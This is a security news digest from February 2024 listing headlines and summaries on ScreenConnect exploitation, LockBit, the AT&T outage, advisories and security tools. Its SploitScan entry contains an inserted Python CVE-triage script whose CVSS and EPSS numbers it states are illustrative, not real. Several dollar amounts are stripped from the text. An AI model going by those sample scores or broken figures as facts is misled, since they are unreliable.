News from the specialist press

ConnectWise ScreenConnect Mass Exploitation Delivers Ransomware
Hundreds of initial access brokers and cybercrime gangs are jumping on the max-critical CVE-2024-1709 authentication bypass, threatening orgs and downstream customers.
https://www.darkreading.com/remote-workforce/connectwise-screenconnect-mass-exploitation-delivers-ransomware

Alarm Over GenAI Risk Fuels Security Spending in Middle East & Africa
Organizations boost cybersecurity budgets to tackle data-privacy and cloud-security threats amid speedy adoption of generative AI.
https://www.darkreading.com/cybersecurity-operations/alarm-over-generative-ai-fuels-security-spending-in-middle-east-africa

Fostering Collaboration for Standardized Threat Investigation & Response
Working together can bring much-needed trust to the industry and help safeguard people, organizations, and government — now and in the future.
https://www.darkreading.com/cybersecurity-operations/fostering-collaboration-standardized-threat-investigation-response

AI Can 'Disproportionately' Help Defend Against Cybersecurity Threats, Google CEO Sundar Pichai Says
This week in cybersecurity from the editors at Cybercrime Magazine. Sausalito, Calif., Feb. 23, 2024: CNBC reports that rapid developments in artificial intelligence could help strengthen defenses against security threats in cyberspace, according to Google CEO Sundar Pichai. Amid growing [...]
https://cybersecurityventures.com/ai-can-disproportionately-help-defend-against-cybersecurity-threats-google-ceo-sundar-pichai-says/

U-Haul says hacker accessed customer records using stolen creds
U-Haul has started informing customers that a hacker used stolen account credentials to access an internal system for dealers and team members to track customer reservations. [...]
https://www.bleepingcomputer.com/news/security/u-haul-says-hacker-accessed-customer-records-using-stolen-creds/

Update now! ConnectWise ScreenConnect vulnerability needs your attention
ConnectWise customers need to take immediate action to remediate a critical vulnerability.
https://www.malwarebytes.com/blog/news/2024/02/update-now-connectwise-screenconnect-vulnerability-needs-your-attention

Windows Photos gets AI magic eraser on Windows 10 and later
Microsoft's Windows Photos app now has its own generative erase tool that enables users to replace unwanted objects with AI-generated content. [...]
https://www.bleepingcomputer.com/news/microsoft/windows-photos-gets-ai-magic-eraser-on-windows-10-and-later/

Deepfake Threat: Deceptive Content Undermines Election Integrity
By Deeba Ahmed. In 2024, over 60 countries worldwide are holding elections. The most significant threat to the integrity of these elections? Deepfake videos, readily accessible on the dark web and Telegram, with prices ranging from as low as to 0.
https://www.hackread.com/deepfake-threat-content-risk-election-integrity/

Cyber security governance: the role of the board
As cyber threats evolve, boards must remain vigilant in cyber security governance.
https://www.ncsc.gov.uk/blog-post/cyber-security-governance-the-role-of-the-board

Missed IWCON 2023? Catch Recorded Expert Sessions Here (Pt. 2)
Hello hacker! Missed attending IWCON 2023, the biggest virtual cybersecurity conference of the world? No worries, we're here at your service with a second chance. Over the next few weeks, we'll be sharing links to watch recordings of all our expert sessions.
Dylan Ayrey. Speaker bio: Security researcher, public speaker and founder of Truffle Security. Topic name: Google OAuth is broken; keep access after leaving. Follow the speaker on Twitter. Video link: Watch video here.
Saikrishna Budamgunta. Speaker bio: Ex-IRS | Founder @ Saptang Labs, Divsight Intelligence, Maitravaruna & Pinaca Technologies. Topic name: Understanding Chinese Cyber Threats. Follow the speaker on Twitter. Video link: Watch video here.
Abhay Bhargav. Speaker bio: Founder and Chief Research Officer of AppSecEngineer. Topic...
https://infosecwriteups.com/missed-iwcon-2023-catch-recorded-expert-sessions-here-pt-2-27237d02cfbf?source=rss----7b722bfd1b8d---4

RepoReaper - An Automated Tool Crafted To Meticulously Scan And Identify Exposed .Git Repositories Within Specified Domains And Their Subdomains
RepoReaper is a precision tool designed to automate the identification of exposed .git repositories across a list of domains and subdomains. By processing a user-provided text file with domain names, RepoReaper systematically checks each for publicly accessible .git files. This enables rapid assessment and protection against information leaks, making RepoReaper an essential resource for security teams and web developers.
Features: automated scanning of domains and subdomains for exposed .git repositories; streamlines the detection of sensitive data exposures; user-friendly command-line interface; ideal for security audits and bug bounty.
Installation: clone the repository and install the required dependencies: git clone https://github.com/YourUsername/RepoReaper.git; cd RepoReaper; pip...
http://www.kitploit.com/2024/02/reporeaper-automated-tool-crafted-to.html

LockBit Gang Money Flow Uncovered : New Strain Under Development
Over the past few years, LockBit, a ransomware-as-a-service (RaaS) operation, has been linked to multiple security incidents affecting organizations worldwide. Yet, they appear to have experienced a lot of logistical, technological, and reputational issues recently. Due to this, LockBit had to decide to act and begin developing a much-needed version of their malware. The new version […]
https://cybersecuritynews.com/lockbit-gang-new-ransomware-version/

ScreenConnect Security Flaw Exploited In The Wild By Attackers
The ScreenConnect software is a popular choice for remote access among organizations worldwide. However, recent vulnerabilities have raised concerns about potential exploitation by attackers. Specifically, these vulnerabilities could allow attackers to access vulnerable instances and distribute ransomware or other malicious payloads to downstream clients. ConnectWise has issued an urgent notification to users of its ScreenConnect remote […]
https://cybersecuritynews.com/screenconnect-vulnerability-exploitation/

MIWIC24: Plexal Alumni Receive Multiple Nominations From Peers at This Year's Awards
Plexal works with some of the UK's most exciting start-ups, entrepreneurs and scale-ups who are building emerging technologies and operating across multiple sectors. Plexal helps build community, foster talent, and launch graduating companies and professionals into success. They work in conjunction with the government and industry to deliver programmes that support the next generation of […]
https://www.itsecurityguru.org/2024/02/23/miwic24-plexal-alumni-receive-multiple-nominations-from-peers-at-this-years-awards/?utm_source=rss&utm_medium=rss&utm_campaign=miwic24-plexal-alumni-receive-multiple-nominations-from-peers-at-this-years-awards

Cyber Mindfulness Corner Company Spotlight: Jamf
At the IT Security Guru we're showcasing organisations that are passionate about making cybersecurity a healthier, more mindful industry. This week, Aaron Webb, Senior Product Marketing Manager at Jamf, spoke to the Gurus about how leaders can approach the burnout crisis in cybersecurity, what the future of the industry looks like if nothing changes, and why […]
https://www.itsecurityguru.org/2024/02/23/cyber-mindfulness-corner-company-spotlight-jamf/?utm_source=rss&utm_medium=rss&utm_campaign=cyber-mindfulness-corner-company-spotlight-jamf

UnitedHealth confirms Optum hack behind US healthcare billing outage
Healthcare giant UnitedHealth Group confirmed that its subsidiary Optum was forced to shut down IT systems and various services after a cyberattack by "nation-state" hackers on the Change Healthcare platform. [...]
https://www.bleepingcomputer.com/news/security/unitedhealth-confirms-optum-hack-behind-us-healthcare-billing-outage/

SUSE: 2024:0595-1 important: python310
Cross-references: bsc#1210638, CVE-2023-27043
https://linuxsecurity.com/advisories/suse/suse-2024-0595-1-important-python310-vefvse3bcnwy

Smart devices: using them safely in your home
Many everyday items are now connected to the internet: we explain how to use them safely.
https://www.ncsc.gov.uk/guidance/smart-devices-in-the-home

New SSH-Snake Malware Abuses SSH Credentials To Spread Itself In The Network
Threat actors abuse SSH credentials to gain unauthorized access to systems and networks. By exploiting weak or compromised credentials, they can execute malicious activities. SSH credential abuse provides a stealthy entry point for threat actors to compromise and control the targeted systems. On January 4th, 2024, the Sysdig Threat Research Team (TRT) discovered a network […]
https://cybersecuritynews.com/snake-malware-abuses-ssh/

Debian: DSA-5629-1: chromium security update
Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.
https://linuxsecurity.com/advisories/debian/debian-dsa-5629-1-chromium-security-update-te7ffyqxxrvz

Online Scams: Are You Safe From Impersonation, Blackmails, and Deception?
We are connected to the digital world that provides us with numerous utilities and entertainment, but sometimes it presents us with undesirable encounters. Online frauds and scams are examples of such encounters. Online scams are not simply at the level of disrupting individuals' daily lives like mass-marketed commercial spam emails. Scamming is a serious cybercrime that inflicts long-term damage both financially and psychologically, and leaves tremendous scars on the victims' lives. When companies are affected by scams, it can cause...
https://asec.ahnlab.com/en/61976/

ConnectWise ScreenConnect Vulnerabilities (CVE-2024-1708 and CVE-2024-1709)
What is the vulnerability? On February 19, 2024, ConnectWise published a security advisory for its remote desktop application software, ScreenConnect. One of the flaws, CVE-2024-1709, is an authentication bypass vulnerability that could let attackers gain administrative access to a ScreenConnect instance. That vulnerability has a public proof-of-concept (PoC) available and has recently been added to CISA's Known Exploited Vulnerabilities catalog. The second flaw, tracked as CVE-2024-1708, is a path traversal vulnerability that may allow an attacker to execute remote code.
What is the vendor solution? ConnectWise has released a patch covering both vulnerabilities. [ Link ]
What FortiGuard coverage is available? FortiGuard Labs is currently investigating related protections and will update as...
https://fortiguard.fortinet.com/threat-signal-report/5389

Fedora 38: pdns-recursor 2024-4e36df9dfd
Update to latest upstream. Fixes CVE-2023-50387 and CVE-2023-50868
https://linuxsecurity.com/advisories/fedora/fedora-38-pdns-recursor-2024-4e36df9dfd-8sgxfea2zr02

Fedora 39: firefox 2024-bc8ea2c2cb
New upstream release (123.0)
https://linuxsecurity.com/advisories/fedora/fedora-39-firefox-2024-bc8ea2c2cb-exy0g6agm4wa

Fedora 39: chromium 2024-4adf990562
Update to 122.0.6261.57. Fixes:
High, CVE-2024-1669: Out of bounds memory access in Blink
High, CVE-2024-1670: Use after free in Mojo
Medium, CVE-2024-1671: Inappropriate implementation in Site Isolation
Medium, CVE-2024-1672: Inappropriate implementation in Content Security Policy
https://linuxsecurity.com/advisories/fedora/fedora-39-chromium-2024-4adf990562-qtwfq5unaai6

Fedora 39: pdns-recursor 2024-b0f9656a76
Update to latest upstream. Fixes CVE-2023-50387 and CVE-2023-50868
https://linuxsecurity.com/advisories/fedora/fedora-39-pdns-recursor-2024-b0f9656a76-da2mfhnyv9da

CISA orders federal agencies to fix ConnectWise ScreenConnect bug in a week
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a ConnectWise ScreenConnect vulnerability, tracked as CVE-2024-1709, to its Known Exploited Vulnerabilities (KEV) catalog. The vulnerability is an authentication bypass issue that an attacker with network access to the […]
https://securityaffairs.com/159511/hacking/cisa-connectwise-screenconnect-known-exploited-vulnerabilities-catalog.html

TrollAgent That Infects Systems Upon Security Program Installation Process (Kimsuky Group)
AhnLab Security Intelligence Center (ASEC) recently discovered that malware strains are downloaded into systems when users try to download security programs from a Korean construction-related association's website. Login is required to use the website's services, and various security programs must be installed to log in. Among the programs that must be installed for login, one of the installers had malware strains inside. When the user downloads and installs the installer, the malware strains are also installed along with the security...
https://asec.ahnlab.com/en/61934/

Intruders in the Library: Exploring DLL Hijacking
Dynamic-link library (DLL) hijacking remains a popular technique to run malware. We address its evolution using examples from the realm of cybercrime and more.
https://unit42.paloaltonetworks.com/dll-hijacking-techniques/

News from the press

AT&T outage sparks concerns of the impact of a possible cyberattack - WPBF
... cyber attack, but Senator Marco Rubio posted on social media that this was a small taste of what a cyber attack would look like, affecting your ...
https://www.wpbf.com/article/florida-att-outage-cyber-attack-concerns-outrage/46917374

AT&T says outage not caused by cyberattack - The Hill
... cyber attack,” the company said in a post on X, formerly Twitter. “We are continuing our assessment to ensure we keep delivering ...
https://thehill.com/policy/technology/4484745-att-outage-not-cyber-attack/

AT&T outage sparks concerns of the impact of a possible cyber attack - YouTube
AT&T outage sparks concerns of the impact of a possible cyber attack ...
https://www.youtube.com/watch%3Fv%3Dn-tYP76OiXk

Warwick Smiles Dental Clinic targeted by 'malicious' cyber attack last year
A Southern Downs healthcare centre has reportedly become victim to a 'malicious' crypto virus cyber attack, with customers urged to stay vigilant ...
https://www.couriermail.com.au/news/queensland/warwick/warwick-smiles-dental-clinic-targeted-by-malicious-cyber-attack-last-year/news-story/bc609079209cd7cc8c206a175f852187

Framwellgate School, Durham, lost 40GB data in cyber attack | The Northern Echo
Framwellgate school in County Durham lost 40 gigabytes of data in a cyber attack, the Police and Crime Commissioner (PCC) has revealed.
https://www.thenorthernecho.co.uk/news/24138324.framwellgate-school-durham-lost-40gb-data-cyber-attack/

Earnings call: Clorox outlines growth strategy amid recent cyber attack - Investing.com
The company has made significant progress in recovering from a cyber attack, aiming for full recovery and continued growth. Clorox is committed to ...
https://www.investing.com/news/stock-market-news/earnings-call-clorox-outlines-growth-strategy-amid-recent-cyber-attack-93CH-3312772

AT&T outage sparks FBI cyber attack investigation - Cyber Daily
The US' largest telco, AT&T, has suffered a major network outage, sparking concerns that a cyber attack may be the cause.
https://www.cyberdaily.au/security/10226-at-t-outage-sparks-fbi-cyber-attack-investigation

CISA & FBI Shares Cyber Attack Defenses for Securing Water Systems - GBHackers
... cyber attack targeting water management systems. The guide provides detailed instructions on how to identify, respond to, and recover from such ...
https://gbhackers.com/cisa-fbi-cyber-defenses-water-systems/

Life after a cyber attack: How organisations can be supported to come back stronger
... Most of us acknowledge that if we were robbed while walking down ...
https://futurescot.com/life-after-a-cyber-attack/

Malawi's passport system gets compromised by cyber-attack - ITWeb Africa
... President Lazarus Chakwera this week announced a major breach ...
https://itweb.africa/content/mQwkoM6YRVn73r9A

Was 13 hour mobile service outage in US a cyber attack? White House responds
Thousands who were left without network for over 13 hours from 4.30am to 2.15pm wondered if it was a cyber attack.
https://www.hindustantimes.com/world-news/us-news/was-mobile-service-outage-in-us-a-cyber-attack-as-conspiracy-theories-float-white-house-responds-initiates-probe-101708663448640.html

AT&T tells 3News its network outage 'was not a cyber attack' - WKYC
... that impacted more than 70000 customers on Thursday, although the company told 3News it was 'not a cyber attack.'
https://www.wkyc.com/article/tech/att-3news-network-outage-not-a-cyber-attack/95-b59d26cc-72ec-4f4a-98c2-f250dc20d2b1

Yesterday's news (specialist press)

Pharmacy Delays Across US Blamed on Nation-State Hackers
Healthcare tech provider Change Healthcare says a suspected nation-state threat actor breached its systems, causing pharmacy transaction delays nationwide.
https://www.darkreading.com/cyberattacks-data-breaches/pharmacy-delays-across-us-blamed-on-nation-state-hackers

Hubris May Have Contributed to Downfall of Ransomware Kingpin LockBit
The most prolific ransomware group in recent years was on the decline at the time of its takedown, security researchers say.
https://www.darkreading.com/cyberattacks-data-breaches/hubris-may-have-caused-lockbit-s-downfall

FTC charged Avast with selling users' browsing data to advertising companies
The US FTC charged cybersecurity firm Avast with harvesting consumer web browsing data through its browser extension and antivirus and selling it. The US Federal Trade Commission (FTC) has filed charges against cybersecurity firm Avast, accusing it of collecting and selling consumer web browsing data gathered through its browser extension and antivirus services. The antivirus […]
https://securityaffairs.com/159499/digital-id/ftc-charged-avast.html

NSA Cybersecurity Director Rob Joyce to Retire
His retirement will go into effect on March 31, concluding 34 years of service to the National Security Agency.
https://www.darkreading.com/cybersecurity-operations/nsa-cybersecurity-director-rob-joyce-to-retire

Microsoft has started testing Wi-Fi 7 support in Windows 11
Microsoft is testing support for Wi-Fi 7 in Windows 11, which offers multi-gigabit speeds and improved throughput, latency, and reliability compared to previous Wi-Fi generations. [...]
https://www.bleepingcomputer.com/news/microsoft/microsoft-has-started-testing-wi-fi-7-support-in-windows-11/

iSoon's Secret APT Status Exposes China's Foreign Hacking Machinations
Chinese government agencies are paying an APT, masked as a legitimate company, to spy on foreign and domestic targets of political interest.
https://www.darkreading.com/threat-intelligence/-isoon-contractor-helps-the-prc-hack-foreign-governments-companies

Insurers Use Claims Data to Recommend Cybersecurity Technologies
Policy holders using certain technologies — such as managed detection and response (MDR) services, Google Workspace, and email security gateways — gain premium discounts from cyber insurers.
https://www.darkreading.com/cyber-risk/insurers-claims-data-recommend-cybersecurity-technologies

Microsoft now force installing Windows 11 23H2 on eligible PCs
Microsoft has started force installing Windows 11 23H2 on eligible devices that have reached or are close to their end-of-servicing date. [...]
https://www.bleepingcomputer.com/news/microsoft/microsoft-now-force-installing-windows-11-23h2-on-eligible-pcs/

Zero-Click Apple Shortcuts Vulnerability Allows Silent Data Theft
Vulnerability CVE-2024-23204, affecting Apple's popular Shortcuts app, suggests a critical need for ongoing security awareness in the macOS and iOS ecosystem.
https://www.darkreading.com/application-security/zero-click-apple-shortcuts-vulnerability-allows-silent-data-theft

Russian Cyberattackers Launch Multiphase PsyOps Campaign
Operation Texonto spanned several months, using various Russian propaganda lures and spear-phishing to misinform and trick users into giving up Microsoft 365 credentials.
https://www.darkreading.com/remote-workforce/russian-cyberattackers-launch-multi-phase-psyops-campaign

“Beyond the border scam”, pay attention to the instance of the new Nigerian fraud
Security researcher Salvatore Lombardo shared details about a new instance of Nigerian fraud that he called ‘Beyond the border scam.’ The 419 scam is a form of scam that requires the recipient to pay an upfront sum to receive a much larger reward later. The name derives from article 419 of the Nigerian penal code which punishes […]
https://securityaffairs.com/159491/cyber-crime/beyond-the-border-scam-nigerian-fraud.html

Bitwarden's new auto-fill option adds phishing resistance
The Bitwarden open-source password management service has introduced a new inline auto-fill menu that addresses the risk of user credentials being stolen through malicious form fields. [...]
https://www.bleepingcomputer.com/news/security/bitwardens-new-auto-fill-option-adds-phishing-resistance/

How to Address CISA Attestation
Get details on the CISA Attestation, how to address it, and how Legit can help.
https://www.legitsecurity.com/blog/how-to-address-cisa-attestation

New ScreenConnect RCE flaw exploited in ransomware attacks
Attackers are exploiting a maximum severity authentication bypass vulnerability to breach unpatched ScreenConnect servers and deploy LockBit ransomware payloads on compromised networks. [...]
https://www.bleepingcomputer.com/news/security/new-screenconnect-rce-flaw-exploited-in-ransomware-attacks/

AT&T Outage Disrupts Service for Millions of Users Across US
By Waqas. You are not alone, an AT&T outage is happening across the United States, and the company is working…
https://www.hackread.com/atampt-outage-disrupts-service-in-united-states/

How Seccomp Profiles Can Improve Kubernetes Security
Seccomp, which comes from "secure computing mode," is a built-in security feature in the Linux kernel that limits the system calls a process can make. Seccomp profiles in Kubernetes help minimize attack surfaces and prevent malicious code execution.
https://linuxsecurity.com/news/cloud-security/seccomp-profiles-kubernetes-security

Joomla XSS Bug Puts Millions of Websites at Risk of RCE
A critical security vulnerability has been found in the popular Joomla open-source content management system that has left millions of websites open to the risk of remote code execution (RCE) due to multiple cross-site scripting (XSS) bugs. The vulnerability is linked to a fundamental flaw in Joomla's core filter component and is tracked as CVE-2024-21726.
https://linuxsecurity.com/news/security-vulnerabilities/joomla-xss-bug

Apple Shortcuts Vulnerability Exposes Sensitive Data, Update Now!
By Waqas. Another day, another Apple security vulnerability!
https://www.hackread.com/apple-shortcuts-vulnerability-exposed-data-update/

UOB, Samsung Back Singapore's Startale Labs in Million Web3 Push
By Owais Sultan. Startale Labs, the developer behind Japan's leading Web3 products like Astar Network and Startale Web3 Cloud, has secured…
https://www.hackread.com/uob-samsung-back-startale-labs-web3-push/

FTC to ban Avast from selling browsing data for advertising purposes
The U.S. Federal Trade Commission (FTC) will order Avast to pay .5 million and ban the company from selling the users' web browsing data or licensing it for advertising purposes. [...]
https://www.bleepingcomputer.com/news/security/ftc-to-ban-avast-from-selling-browsing-data-for-advertising-purposes/

Why ransomware gangs love using RMM tools—and how to stop them
More and more ransomware gangs are using RMM tools in their attacks.
https://www.malwarebytes.com/blog/business/2024/02/why-ransomware-gangs-love-using-rmm-tools-and-how-to-stop-them

Massive AT&T outage impacts US mobile subscribers
Tens of thousands of U.S. customers from Verizon, T-Mobile, and AT&T have been complaining about lack of wireless service or interruptions on Thursday morning. [...]
https://www.bleepingcomputer.com/news/mobile/massive-atandt-outage-impacts-us-mobile-subscribers/

How to Analyse Crypto Malware in ANY.RUN Sandbox?
ANY.RUN, an interactive malware sandbox, has published a comprehensive analysis of the growing threat that crypto-malware poses in a time when it is more important than ever to have strong digital security. This malicious software, designed to covertly mine cryptocurrency using infected devices' processing power, represents a significant shift in the cyber threat landscape. Let's […]
https://cybersecuritynews.com/how-to-analyse-crypto-malware/

Multiple XSS flaws in Joomla can lead to remote code execution
Joomla maintainers have addressed multiple vulnerabilities in the popular content management system (CMS) that can lead to arbitrary code execution. The maintainers of the Joomla! Project released Joomla versions 5.0.3 and 4.4.3, which addressed the following vulnerabilities in the popular content management system (CMS): The impact of these flaws can be widespread because roughly 2% of […]
https://securityaffairs.com/159487/security/joomla-xss-flaws.html

4 Key Steps to Reevaluate Your Cybersecurity Priorities
Amid a spike in attacks, now is a good time for brands to strengthen their cybersecurity strategy.
https://www.darkreading.com/cybersecurity-operations/4-key-steps-to-reevaluate-your-cybersecurity-priorities

Iran-Backed Charming Kitten Stages Fake Webinar Platform to Ensnare Targets
The latest ploy by the APT also known as Charming Cypress targets policy experts in the Middle East, Europe, and the US.
https://www.darkreading.com/vulnerabilities-threats/iran-backed-charming-kitten-stages-fake-webinar-platform-to-ensnare-targets

Bluzelle's Curium App Makes Crypto Earning Effortless
By Uzair Amir. Meet Curium by Bluzelle, a new Miner Pool app.
https://www.hackread.com/bluzelles-curium-app-makes-crypto-earning/

Details on Apple's Shortcuts Vulnerability: A Deep Dive into CVE-2024-23204
CVE-2024-23204 [https://nvd.nist.gov/vuln/detail/CVE-2024-23204] shows how an automation feature can become a privacy risk: Apple's Shortcuts application, designed to help users automate tasks, could be turned into a vector for privacy breaches. This analysis gives users, developers, and security professionals an account of the nature of the vulnerability, its potential impact, and recommended mitigations. At a glance: * We have discovered a vul […]
https://www.bitdefender.com/blog/labs/details-on-apples-shortcuts-vulnerability-a-deep-dive-into-cve-2024-23204/

Sonatype Unveils State-of-the-Art Artificial Intelligence Component Detection
In the rapidly evolving world of software development, the adoption of artificial intelligence (AI) and machine learning (ML) is no longer just a trend—it's a revolution.
https://blog.sonatype.com/sonatype-unveils-state-of-the-art-artificial-intelligence-component-detection

Russian Government Software Hijacked to Install Konni RAT
The German cybersecurity firm DCSO found software used by the Russian government backdoored to install the Konni Remote Access Trojan (RAT), a covert backdoor built for data exfiltration. The finding highlights ongoing cyber espionage against Russian entities, including the Ministry of Foreign […]
https://cybersecuritynews.com/konni-rat-russia/

LockBit ransomware secretly building next-gen encryptor before takedown
LockBit ransomware developers were secretly building a new version of their file encrypting malware, dubbed LockBit-NG-Dev - likely a future LockBit 4.0, when law enforcement took down the cybercriminal's infrastructure earlier this week. [...]
https://www.bleepingcomputer.com/news/security/lockbit-ransomware-secretly-building-next-gen-encryptor-before-takedown/

‘Supply Chain Q&A' Launches On The Cybercrime Magazine Podcast
This week in cybersecurity from the editors at Cybercrime Magazine. Listen to the 5-minute Cybercrime Magazine Podcast episode. Sausalito, Calif., Feb. 22, 2024. Cassie Crossley, VP, Supply Chain Security, Cybersecurity & Product Security Office at Schneider Electric, a French multinational company that specializes […]
https://cybersecurityventures.com/supply-chain-qa-launches-on-the-cybercrime-magazine-podcast/

New Cybereason ‘True Cost to Business Study 2024' Reveals it Still Doesn't Pay to Pay
Cybereason has announced the results of its third annual ransomware study, commissioned to better understand the true impact of ransomware on businesses. The global study finds ransomware attacks becoming more frequent, effective, and sophisticated: 56 percent of organisations surveyed suffered more than one ransomware attack in the last 24 months. It still doesn't […]
https://www.itsecurityguru.org/2024/02/22/new-cybereason-true-cost-to-business-study-2024-reveals-it-still-doesnt-pay-to-pay/?utm_source=rss&utm_medium=rss&utm_campaign=new-cybereason-true-cost-to-business-study-2024-reveals-it-still-doesnt-pay-to-pay

New Leak Shows Business Side of China's APT Menace
A new data leak that appears to have come from one of China's top private cybersecurity firms provides a rare glimpse into the commercial side of China's many state-sponsored hacking groups. Experts say the leak illustrates how Chinese government agencies increasingly are contracting out foreign espionage campaigns to the nation's burgeoning and highly competitive cybersecurity industry.
https://krebsonsecurity.com/2024/02/new-leak-shows-business-side-of-chinas-apt-menace/

Apple Adds PQ3 post-quantum Encryption for iMessage
Apple has released PQ3, a new post-quantum cryptographic protocol for iMessage, which it describes as the first messaging protocol to reach what Apple calls Level 3 security. iMessage last changed its cryptography in 2019, when it moved from RSA to elliptic-curve cryptography (ECC), with several further upgrades since. "PQ3 introduces a new post-quantum encryption key in the set of […]"
https://cybersecuritynews.com/apple-pq3-post-quantum-imessage/

SploitScan - A Sophisticated Cybersecurity Utility Designed To Provide Detailed Information On Vulnerabilities And Associated Proof-Of-Concept (PoC) Exploits
SploitScan is a command-line tool for finding known exploits for a given vulnerability together with its exploitation probability, so that defenders can quickly test their exposure to a CVE and build detection for emerging threats.
Features:
- CVE Information Retrieval: fetches CVE details from the National Vulnerability Database.
- EPSS Integration: includes Exploit Prediction Scoring System (EPSS) data, a probability score for the likelihood of exploitation, to aid prioritization.
- PoC Exploits Aggregation: gathers publicly available PoC exploits, enhancing the understanding...
http://www.kitploit.com/2024/02/sploitscan-sophisticated-cybersecurity.html
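The feature list above names a workflow (NVD lookup, EPSS score, PoC count) without showing it. The script below is an added example, not SploitScan's code: it parses responses in the shape of the NVD 2.0 and FIRST EPSS APIs and ranks CVEs into triage tiers. The two JSON payloads are constructed to mirror those formats; the CVSS and EPSS numbers and the PoC count in them are illustrative, not the real values for the CVEs named, and the tier thresholds (EPSS_ACT_NOW, CVSS_HIGH) are an assumed policy, not SploitScan's.

```python
"""Rank CVEs by CVSS (NVD), EPSS (FIRST) and public PoC count.

Added example, not SploitScan's code. The payloads below are constructed to
mirror the NVD 2.0 and EPSS API response shapes; the scores are illustrative.
"""
import json

NVD_API = "https://services.nvd.nist.gov/rest/json/cves/2.0"
EPSS_API = "https://api.first.org/data/v1/epss"

# Assumed triage policy for this example (not SploitScan's):
EPSS_ACT_NOW = 0.10   # EPSS probability at or above this is "fix now"
CVSS_HIGH = 7.0       # CVSS v3.1 base score at or above this is high/critical

# Constructed NVD 2.0 response (shape only; the scores are not the real ones).
NVD_SAMPLE = json.dumps({
    "vulnerabilities": [
        {"cve": {"id": "CVE-2024-1709", "metrics": {"cvssMetricV31": [
            {"type": "Primary", "cvssData": {"baseScore": 10.0, "baseSeverity": "CRITICAL"}}]}}},
        {"cve": {"id": "CVE-2024-1708", "metrics": {"cvssMetricV31": [
            {"type": "Primary", "cvssData": {"baseScore": 8.4, "baseSeverity": "HIGH"}}]}}},
        # Constructed case of a CVE that NVD has not scored yet.
        {"cve": {"id": "CVE-2024-23204", "metrics": {}}},
    ]
})

# Constructed EPSS response; the real API serialises epss/percentile as strings.
EPSS_SAMPLE = json.dumps({
    "status": "OK",
    "data": [
        {"cve": "CVE-2024-1709", "epss": "0.96000", "percentile": "0.99700", "date": "2024-02-23"},
        {"cve": "CVE-2024-1708", "epss": "0.00450", "percentile": "0.73000", "date": "2024-02-23"},
    ],
})


def nvd_url(cve_id):
    """NVD 2.0 lookup; the API takes one cveId per request."""
    return f"{NVD_API}?cveId={cve_id}"


def epss_url(cve_ids):
    """EPSS lookup; the API accepts a comma-separated list of CVE ids."""
    return f"{EPSS_API}?cve={','.join(cve_ids)}"


def parse_nvd(payload):
    """Map CVE id -> CVSS v3.1 base score, or None when NVD has not scored it."""
    scores = {}
    for entry in json.loads(payload).get("vulnerabilities", []):
        cve = entry["cve"]
        metrics = cve.get("metrics", {}).get("cvssMetricV31", [])
        # Prefer NVD's own "Primary" score when several sources are listed.
        primary = [m for m in metrics if m.get("type") == "Primary"] or metrics
        scores[cve["id"]] = primary[0]["cvssData"]["baseScore"] if primary else None
    return scores


def parse_epss(payload):
    """Map CVE id -> EPSS probability as a float."""
    return {row["cve"]: float(row["epss"]) for row in json.loads(payload).get("data", [])}


def tier_for(cvss, epss, pocs):
    """P1: likely exploited or weaponised; P2: severe but no evidence; P3: the rest."""
    severity = cvss or 0.0
    if epss >= EPSS_ACT_NOW or (pocs > 0 and severity >= CVSS_HIGH):
        return "P1"
    if severity >= CVSS_HIGH:
        return "P2"
    return "P3"


def prioritize(nvd_payload, epss_payload, poc_counts):
    """Return one row per CVE in NVD's payload, most urgent first."""
    cvss = parse_nvd(nvd_payload)
    epss = parse_epss(epss_payload)
    rows = []
    for cve_id, score in cvss.items():
        prob = epss.get(cve_id, 0.0)       # absent from EPSS => treat as 0
        pocs = poc_counts.get(cve_id, 0)
        rows.append({"cve": cve_id, "cvss": score, "epss": prob,
                     "pocs": pocs, "tier": tier_for(score, prob, pocs)})
    rows.sort(key=lambda r: (r["tier"], -r["epss"], -(r["cvss"] or 0.0), -r["pocs"]))
    return rows


if __name__ == "__main__":
    # Constructed PoC count: pretend a dozen public PoCs exist for CVE-2024-1709.
    for row in prioritize(NVD_SAMPLE, EPSS_SAMPLE, {"CVE-2024-1709": 12}):
        print(row)
```

To run it against live data, replace the constructed payloads with the bodies returned by the URLs from nvd_url() and epss_url(). EPSS serialises its numbers as strings, which is why parse_epss converts them, and a CVE that NVD has not yet scored keeps a cvss of None rather than being silently dropped from the ranking.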

Signal to shield user phone numbers by default
Chat app Signal will shield users' phone numbers by default from now on. Check whether you need to change your settings to adapt to the new version
https://www.malwarebytes.com/blog/news/2024/02/signal-to-shield-user-phone-numbers-by-default

Hackers launched 250,000+ Attacks to Exploit Ivanti VPN 0-Day
Ivanti Connect Secure vulnerabilities disclosed in January 2024 gave threat actors a gateway into corporate networks. The two flaws, CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (arbitrary command execution), can be chained for unauthenticated remote command execution on affected systems. Ivanti addressed these vulnerabilities in […]
https://cybersecuritynews.com/hackers-launched-250000-attacks/

Hackers Heavily Abusing Google Cloud Run to Deliver Banking Malware
Large-scale malware distribution campaigns are abusing Google Cloud Run to deliver banking trojans, including Astaroth (also known as Guildma), Mekotio, and Ousaban, to targets in Europe and Latin America. Cloud Run is a fully managed platform that runs code on Google's scalable infrastructure; it hosts front-end […]
https://cybersecuritynews.com/hackers-heavily-abusing-google-cloud/

Apple Approves Fake App Before Real Rabby Wallet, Users' Funds Stolen
By Waqas. Crypto nightmare: a fake Rabby Wallet app stole millions after the Apple App Store approved it ahead of the real one.
https://www.hackread.com/apple-approves-fake-app-before-real-rabby-wallet/

VoltSchemer – Wireless Charger Attack Boils Phone and Injects Voice Commands
Wireless chargers can be abused for several malicious activities, such as implanting malware or mounting power-related attacks on the device being charged. The rising popularity of wireless charging brings convenience, but research by Zihao Zhan, Yirui Yang, Haoqi Shan, Hanqiu Wang, Yier Jin, and Shuo Wang from the University of Florida and CertiK uncovered vulnerabilities. They found that electromagnetic […]
https://cybersecuritynews.com/voltschemer-wireless-charger-attack/

Wyze webcam Flaw let strangers see into some users' homes
Five months after a similar incident, Wyze cameras are back in the headlines for a privacy failure. The Verge reports that dozens of users could see images from strangers' homes, raising serious concerns about the security of these popular devices. At least 12 users reported seeing thumbnails from cameras they didn't own in their Wyze […]
https://cybersecuritynews.com/wyze-webcam-flaw/

New Mustang Panda campaign targets Asia with a backdoor dubbed DOPLUGS
